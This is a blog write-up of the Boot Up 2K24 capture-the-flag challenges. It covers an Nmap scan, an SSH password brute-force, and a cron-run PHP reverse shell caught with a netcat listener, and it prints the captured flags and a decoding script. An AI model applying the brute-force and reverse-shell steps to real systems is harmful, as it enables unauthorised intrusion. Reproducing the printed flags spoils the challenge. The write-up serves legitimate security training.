Bootup24 - Shemkumar's Portfolio

Detailed Write-up for Boot Up 2K24 CTF

---
layout: post
title: "Boot Up 2K24 CTF Writeup"
date: 2024-07-29
categories: [CTF, Security]
---

# Boot Up 2K24 CTF Writeup

## Task 1: SSH and User Flag

### Step 1.1: Nmap Scan

First, I performed an Nmap scan to identify open ports on the target machine:

![Nmap Scan Result](https://raw.githubusercontent.com/shemkumar/shemkumar.github.io/main/_posts/Screenshot%202024-07-29%20141448.png)

Here’s the result of the Nmap scan:

```plaintext
Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-29 09:44 BST
Nmap scan report for ip-10-10-40-67.eu-west-1.compute.internal (10.10.40.67)
Host is up (0.00029s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy

Step 1.2: Brute-Forcing SSH Password

Based on the scan, I found that ports 22 (SSH), 80 (HTTP), and 8080 (HTTP-Proxy) were open. I decided to brute-force the SSH password for the user bootup24.

After successfully brute-forcing the SSH password, I logged in and retrieved the first user flag:

root@ip-10-10-233-66:~# ssh bootup24@10.10.40.67
The authenticity of host '10.10.40.67 (10.10.40.67)' can't be established.
ECDSA key fingerprint is SHA256:IT1oaQY12jhOmyoQGZC1hKHtYUWy6i8rET2yKX0KkpI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.40.67' (ECDSA) to the list of known hosts.
bootup24@10.10.40.67's password: 
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
bootup24@deathnote:~$ ls
flag.txt
bootup24@deathnote:~$ cat flag.txt
BootUp2k24{Falalalala!!!__D1dnt_G3t_anything_b3tter}

Task 2: Cron Job and Root Flag

Step 2.1: Identifying the Cron Job

Next, I checked for cron jobs and discovered a cron job running a PHP reverse shell. This cron job allowed me to gain a reverse shell on the target machine.

Step 2.2: Using Netcat to Get the Root Flag

I used nc (netcat) to listen for incoming connections and get the reverse shell. Once connected, I was able to retrieve the root flag:

root@ip-10-10-233-66:~# nc -lnvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.40.67 56298 received!
sh: 0: can't access tty; job control turned off
$ ls
flag.txt
$ cat flag.txt
BootUp2k24{Cr0n_D0n3_R1ghT}

Task 3: Reverse Engineering Challenge

Step 3.1: Analyzing the Provided Code

The reverse engineering challenge provided the following array of hexadecimal values:

int local_78 [26] = {0x84, 0x91, 0x9e, 0xa3, 0xa9, 0xa5, 0x82, 0x66, 0xaf, 0xb2, 0x9f, 0x9b, 0x92, 0x92, 0x9a, 0xce, 0xc6, 0xc2, 0xd5, 0xa6, 0x97, 0xce, 0x9e, 0x97, 0xe1};

Step 3.2: Decoding the Magic Word

Using a simple Python script, I decoded the magic word by iterating over the array and applying the required transformations:

a = [0x84, 0x91, 0x9e, 0xa3, 0xa9, 0xa5, 0x82, 0x66, 0xaf, 0xb2, 0x9f, 0x9b, 0x92, 0x92, 0x9a, 0xce, 0xc6, 0xc2, 0xd5, 0xa6, 0x97, 0xce, 0x9e, 0x97, 0xe1]
minus = ord('B')
for i in a:
    print(chr(i-minus), end="")
    minus = i-minus
print("")

Step 3.3: Output of the Script

The script outputs the following magic word:

BOOTUP24{7h3_3gg_cr4ck3d}

Task 1: SSH and User Flag

Step 1.1: Nmap Scan: This step explains how you performed an Nmap scan to find open ports on the target machine. The scan result is shown both in text and as an image.
Step 1.2: Brute-Forcing SSH Password: This step explains how you brute-forced the SSH password and logged into the target machine to retrieve the first flag. The terminal commands and outputs are provided.

Task 2: Cron Job and Root Flag

Step 2.1: Identifying the Cron Job: This step explains how you identified a cron job running a PHP reverse shell.
Step 2.2: Using Netcat to Get the Root Flag: This step explains how you used netcat to listen for a reverse shell connection and retrieve the root flag. The terminal commands and outputs are provided.

Task 3: Reverse Engineering Challenge

Step 3.1: Analyzing the Provided Code: This step explains the given array of hexadecimal values that needed to be decoded.
Step 3.2: Decoding the Magic Word: This step explains the Python script used to decode the magic word.
Step 3.3: Output of the Script: This step shows the output of the script, which is the decoded magic word.